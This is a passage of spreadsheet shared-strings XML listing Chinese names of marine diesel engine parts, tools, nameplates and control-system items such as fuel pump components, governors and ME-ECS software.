    <t xml:space="preserve">扫气空气旁通调节器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">温度，压力仪表安装板                                        </t>
  </si>
  <si>
    <t xml:space="preserve">接线图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴冷却泵启动器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">指示仪器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">变换器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力变送器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">旋转开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">恒温器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备用起动器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">执行器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电缆线路                                              </t>
  </si>
  <si>
    <t xml:space="preserve">传感器底座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴承热传感器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发动机自动化                                            </t>
  </si>
  <si>
    <t xml:space="preserve">恒温，恒压器安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">慢转盒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮刻度                                              </t>
  </si>
  <si>
    <t xml:space="preserve">限位开关盒                                             </t>
  </si>
  <si>
    <t xml:space="preserve">负载控制箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴承安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">发动机控制箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">加热元件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">漏水传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">漏水继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度，压力面板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">鼓风背压监控                                            </t>
  </si>
  <si>
    <t xml:space="preserve">WOODWARD调速器信息                                     </t>
  </si>
  <si>
    <t xml:space="preserve">起动盒/箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">负载控制信号图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">负载控制略图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冲程锁扣限制器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">防护罩                                               </t>
  </si>
  <si>
    <t xml:space="preserve">泵体                                                </t>
  </si>
  <si>
    <t xml:space="preserve">内衬套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">衬套体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">柱塞                                                </t>
  </si>
  <si>
    <t xml:space="preserve">泵盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">调整轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">刻度                                                </t>
  </si>
  <si>
    <t xml:space="preserve">调整指南                                              </t>
  </si>
  <si>
    <t xml:space="preserve">指示器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">齿条用螺塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿条头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮辋                                               </t>
  </si>
  <si>
    <t xml:space="preserve">齿条                                                </t>
  </si>
  <si>
    <t xml:space="preserve">停缸活塞头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑阀                                                </t>
  </si>
  <si>
    <t xml:space="preserve">泵柱塞螺塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止回阀壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导衬                                                </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵壳体毛坯                                           </t>
  </si>
  <si>
    <t xml:space="preserve">减震器活塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀标准螺钉                                           </t>
  </si>
  <si>
    <t xml:space="preserve">减震器法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">减震器壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">蜗杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">螺母，蜗杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">标牌                                                </t>
  </si>
  <si>
    <t xml:space="preserve">锁扣连接块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气缸悬架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">叉杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">间隔圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">球环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">接头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">导向螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">正时指导                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制阀壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制阀座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器活塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀座支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油出口法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">限位螺塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">执行器法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">有槽的衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气动缸活塞                                             </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封壳体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀轴/杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锥环(2半)                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锥套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">金属波纹管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">切断阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧，压力阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封弹簧工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环安装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵壳体取出工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">低衬垫取出工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵提前角测量工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀-位移                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀波纹管拆卸工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">控制阀座研磨轴                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵上紧模板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀研磨轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封环衬套安装                                           </t>
  </si>
  <si>
    <r>
      <t>锥形密封圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                         </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">密封压入工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封压缩工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">隔离环，密封工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">封口螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接插座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">整体气缸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵毛坯法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气动液压泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">双面推力销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调节阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">节流阀，节流圈                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵盖总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">恒压阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导向柱塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">毡包垫料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">制动器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">迷宫环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">操纵控制台安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">前板切断                                              </t>
  </si>
  <si>
    <t xml:space="preserve">仪表安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气动部件安装板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵控制板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">仪表                                                </t>
  </si>
  <si>
    <t xml:space="preserve">仪表板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带附件的继电器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电子单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">灯罩                                                </t>
  </si>
  <si>
    <t xml:space="preserve">灯取出工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发光二极管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备用铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调节手柄铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">应急运转铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">临界转速铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油前铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油后铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">海水铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮滑油铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主机滑油铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却油铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">零部件铭牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">测量开关铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向系统铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">参数标牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全空气阀开铭牌                                          </t>
  </si>
  <si>
    <t xml:space="preserve">安全空气阀关铭牌                                          </t>
  </si>
  <si>
    <t xml:space="preserve">泵1或2铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电源铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盘车机齿轮啮合铭牌                                         </t>
  </si>
  <si>
    <t xml:space="preserve">照明铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">应急电源铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">转向错误报警铭牌                                          </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机铭牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵齿轮铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压清洁铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刹车轴指示牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">船桥输入铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调节手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">板安装                                               </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍                                                </t>
  </si>
  <si>
    <t xml:space="preserve">手动调节活塞                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定零件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">装配                                                </t>
  </si>
  <si>
    <t xml:space="preserve">指示牌                                               </t>
  </si>
  <si>
    <t xml:space="preserve">丹麦语指示牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">英语指示牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法语指示牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">西班牙语指示牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">葡萄牙语指示牌                                           </t>
  </si>
  <si>
    <t xml:space="preserve">俄语指示牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">波兰语指示牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">意大利指示牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">德语指示牌                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰盘座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">执行器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">3通球阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子流量触发器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">零件板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铭牌                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器球阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">恒温恒压器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电气图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">重油供油泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">重油循环泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴冷却泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">船用柴油增压泵                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵单元                                               </t>
  </si>
  <si>
    <t xml:space="preserve">旁通阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">泵                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">IMO泵备件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">DN25固定套件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">SERBOCROATIAN说明板                                  </t>
  </si>
  <si>
    <t xml:space="preserve">剂量泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油增压泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">零部件安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油联合控制面板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MDO应急泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">站场模型图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">总布置图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">粘度传感器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">粘度控制器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">重燃油增压泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油放气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">车钟说明书                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气罐                                               </t>
  </si>
  <si>
    <t xml:space="preserve">座                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">电路图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">预热器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">1＃三通阀V1-V2                                        </t>
  </si>
  <si>
    <t xml:space="preserve">特殊单元总布置图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">流量计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">泄放阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">通风设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滤器                                                </t>
  </si>
  <si>
    <t xml:space="preserve">调节轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主燃油泵壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主燃油泵法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带齿轮的轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵体组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">旋转包装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">齿形联轴节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油密封环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴封                                                </t>
  </si>
  <si>
    <t xml:space="preserve">盖安装                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铸造轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰盘轴承总成                                          </t>
  </si>
  <si>
    <t xml:space="preserve">分离式接头部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活动杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆管子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">叉头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆连接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">旁通系统安装指南                                          </t>
  </si>
  <si>
    <t xml:space="preserve">试车指南                                              </t>
  </si>
  <si>
    <t xml:space="preserve">旁通系统用户手册                                          </t>
  </si>
  <si>
    <t xml:space="preserve">旁通系统面板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">旁通系统软件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸控制单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机控制单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PMI内部传感器适配器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PMI外部传感器适配器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PMI传感器适配器螺母                                       </t>
  </si>
  <si>
    <t xml:space="preserve">位移传感器橡胶垫                                          </t>
  </si>
  <si>
    <t xml:space="preserve">磨损传感器插销                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电压监控系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">传感器适配器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">传感器适配器密封环                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴承总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">遥控起动磁阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">联结螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">联接                                                </t>
  </si>
  <si>
    <t xml:space="preserve">臂                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">停车杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调速器杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球头销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">臂支撑                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆端                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴承支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">角剖面                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器臂毛坯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">U形剖面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">节流阀执行器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车臂挡块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压泵伺服马达布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压泵伺服马达总成                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压泵伺服马达支架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">终端设备控制杆                                           </t>
  </si>
  <si>
    <t xml:space="preserve">适配板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调速器主轴托盘                                           </t>
  </si>
  <si>
    <t xml:space="preserve">定距板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷雾插销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱齿轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器控制系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">标准替换零件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锥齿轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶盖装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推进负载曲线                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调速器滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">速度控制                                              </t>
  </si>
  <si>
    <t xml:space="preserve">SPM-A同步装置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">调速器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">双燃油控制                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷雾螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油位计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">同步电机                                              </t>
  </si>
  <si>
    <t xml:space="preserve">LAMBDA缸的空气管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">停车电磁阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">抑制二极管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">编程器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">开口销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">EGB-1.OP调速器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PGA12调速器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">插座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">超速停车装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">右旋弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">终点开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">微型开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀支撑                                               </t>
  </si>
  <si>
    <t xml:space="preserve">锥齿轮毂                                              </t>
  </si>
  <si>
    <t xml:space="preserve">伞齿轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">定距筒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">ME-ECS软件测试                                        </t>
  </si>
  <si>
    <t xml:space="preserve">ME-ECS参数设定                                        </t>
  </si>
  <si>
    <t xml:space="preserve">ME-ECS软件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">ME-ECS，PC图像操作系统                                   </t>
  </si>
  <si>
    <t xml:space="preserve">夹块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">链接                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸燃油限制弹簧                                          </t>
  </si>
  <si>
    <t xml:space="preserve">调速器驱动壳体                                           </t>
  </si>
  <si>
    <t xml:space="preserve">发动机元件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气动部件箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">变速箱轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">停车装置布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">法兰轴承壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接线板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电调托架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防护板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">钢琴线                                               </t>
  </si>
  <si>
    <t xml:space="preserve">计数器板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力转换器装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮壳体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑瓦                                                </t>
  </si>
  <si>
    <t xml:space="preserve">圆锥轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机旁控制箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">分配管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱形管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空气集管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止推环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">销轴                                                </t>
  </si>
  <si>
    <t xml:space="preserve">锁球                                                </t>
  </si>
  <si>
    <t xml:space="preserve">接触杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气动板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阻塞螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">角杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">应急控制台                                             </t>
  </si>
  <si>
    <t xml:space="preserve">定位螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">驱动器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">杆总成                                               </t>
  </si>
  <si>
    <t xml:space="preserve">指针                                                </t>
  </si>
  <si>
    <t xml:space="preserve">偏心的                                               </t>
  </si>
  <si>
    <t xml:space="preserve">节流螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电位计锁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缓冲器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电阻                                                </t>
  </si>
  <si>
    <t xml:space="preserve">整流器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">稳压二极管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">钥匙开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">耦合盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀件                                                </t>
  </si>
  <si>
    <t xml:space="preserve">起动器柱塞阀壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">外弹簧                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内弹簧                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀柱塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力安全阀1/4寸                                         </t>
  </si>
  <si>
    <t xml:space="preserve">减压阀1/4寸                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气滑阀壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气滑阀盒                                           </t>
  </si>
  <si>
    <t xml:space="preserve">紧配销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">侧面构件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁定销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">保持架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">PI23压力表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">示功器传动机构                                           </t>
  </si>
  <si>
    <t xml:space="preserve">示功器传动支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导轨滑轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导套壳体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功凸轮模板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管式冷凝器Y56                                          </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">开口环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">密封螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带轴承壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">托架                                                </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧器链轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拉紧螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拉紧螺栓壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">腰形螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拉紧螺栓头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">配重                                                </t>
  </si>
  <si>
    <t xml:space="preserve">平衡块链轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬                                                </t>
  </si>
  <si>
    <t xml:space="preserve">扭力弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柔性接头销规                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧器保持工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器轮提升工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">量表                                                </t>
  </si>
  <si>
    <t xml:space="preserve">减震器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">取样工具箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">减振特性                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带附件装置的减振器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气集管                                            </t>
  </si>
  <si>
